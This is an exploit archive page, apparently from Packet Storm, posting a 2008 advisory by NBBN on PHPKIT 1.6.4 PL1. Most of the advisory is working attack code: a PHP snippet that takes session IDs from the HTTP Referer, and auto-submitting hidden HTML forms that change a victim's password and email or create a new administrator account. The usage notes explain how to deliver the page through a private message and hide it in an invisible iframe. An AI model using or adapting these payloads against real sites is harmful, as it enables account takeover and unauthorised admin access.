exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpkit-xsrf.txt

phpkit-xsrf.txt
Posted Jan 30, 2008
Authored by NBBN

PHPKIT version 1.6.4 PL1 suffers from multiple cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
SHA-256 | bd686a8d96632c15e6c574107869fd642622cbadb3de3bd820f5ae158927a167

phpkit-xsrf.txt

Change Mirror Download
###################################################################
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilites founded by NBBN
###################################################################

Vendor: http://www.phpkit.de/

PHPKIT sends in all link in the forum the sessionid via GET. So if an attacker
send a link to a victim, for example in a private message, he have the
sessionid if he filter the Referer:

*******************************************************************************************
<?php
*
$ref = $_SERVER['HTTP_REFERER']; // Here is the referer
*
$sid = substr($ref,strpos($ref,'PHPKITSID=')+10,32); // Now the atttacker
have the sessionid.
?>
*
*******************************************************************************************



::Vulnerabilites:

There are two vulnerabilities(there more XSRF, but the principle is the same)

1) Update User Profile XSRF (don't ask for current password)
2) Create an admin XSRF




1)
<?php
/*###################################################################################################################################
PHPKIT 1.6.4 PL1 Change User-Profile Vulnerability founded by NBBN. Founded
on 26th, January 2008.
#####################################################################################################################################

With this XSRF Exploit an attacker can change the profile of an user. PHPKIT
sends in all link in the cms the sessionid of the user. And in the profile,
don't ask for the old password, so we can change, if we have the sessionid
the users password, email etc.

But where we become the sessionid? This is easy, we must only filter the
referer and then submit the form.

Usage: Create a php file with this code, upload it and send a pm to the victim
with this link. If victim click -> profile updated. Better is to create a
site an then this code in a invisible iframe*/

$ref = $_SERVER['HTTP_REFERER']; // Here is the referer
$sid = substr($ref,strpos($ref,'PHPKITSID=')+10,32);
?>


<html>
<head></head>

<body onLoad="javascript:document.form.submit()">
<form
action="http://localhost/xampp/phpkit/upload_files/include.php?path=userprofile&mode=edit"
method="POST" name="form">
<input type="hidden" name="PHPKITSID" value=<?php $sid ?> > <!-- Here is our
sessionid getting from the referer -->
<input type="hidden" name="ud_nick" value="Admin"> <!-- Enter here the
victims username -->
<input type="hidden" name="ud_newpw1" value="Pw"> <!-- Define a new
password -->
<input type="hidden" name="ud_newpw2" value="Pw"><!-- Dito -->
<input type="hidden" name="ud_email" value="email@provider.tld"> <!-- Here you
can define a new e-mail address -->
<input type="hidden" name="ud_emailshow" value="1">
<input type="hidden" name="ud_sex" value="d">
<input type="hidden" name="user_bd_day" value="0">
<input type="hidden" name="user_bd_month" value="0">
<input type="hidden" name="user_bd_year" value="0">
<input type="hidden" name="ud_country" value="def">
<input type="hidden" name="ud_hpage" value="">
<input type="hidden" name="ud_aimid" value="">
<input type="hidden" name="ud_yim" value="">
<input type="hidden" name="ud_icqid" value="">
<input type="hidden" name="ud_usersig" value="">
<input type="hidden" name="ud_userqou" value="">
<input type="hidden" name="ud_userhobby" value="">
<input type="hidden" name="action" value="Speichern">
<input type="hidden" name="save" value="Speichern">
</form>
</body></html>





2) Create admin

IMPORTENT: This works only if the admin was logged in the admincp before he
click the link from the attacker.

<?php
$r = $_SERVER['HTTP_REFERER'];

$sid = substr($r,strpos($r,'PHPKITSID=')+10,32);
?>
<html>
<head>
</head><body onLoad=javascript:document.edituser.submit()>

<form name="edituser" method="post"
action="http://localhost/xampp/phpkit/upload_files/pk/include.php?path=useredit&editid=new"><input
type="hidden" name="PHPKITSID" value=<?php $sid ?> />
<input type="hidden" name="editid" value="new">

<input type="text" size="25" name="edit_name" value="OIW" maxlength="50"
class="w90" /> <!-- Username -->
<input type="text" size="25" name="edit_nick" value="OIW" maxlength="50"
class="w90" /> <!-- username-->
<input type="password" name="edit_password" size="25" class="w90"
value="Password" /> <!-- A password -->
<input type="hidden" name="edit_status" value="admin"> <!--
Status -->
<input type="hidden" name="edit_groupid" value="0">
<input class="checkbox" type="checkbox" name="edit_activate" value="1"
checked />
<input class="checkbox" type="checkbox" name="edit_profillock" value="1" />
<input type="text" size="25" name="edit_email" value="mail@mail.tld" > <!--
Email -->
<input type="hidden" name="edit_notify" value="1" /></td>
<input type="hidden" name="action" value="Speichern" />
<input type="hidden" name="save" value="Speichern">
</form>
</body></html>
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close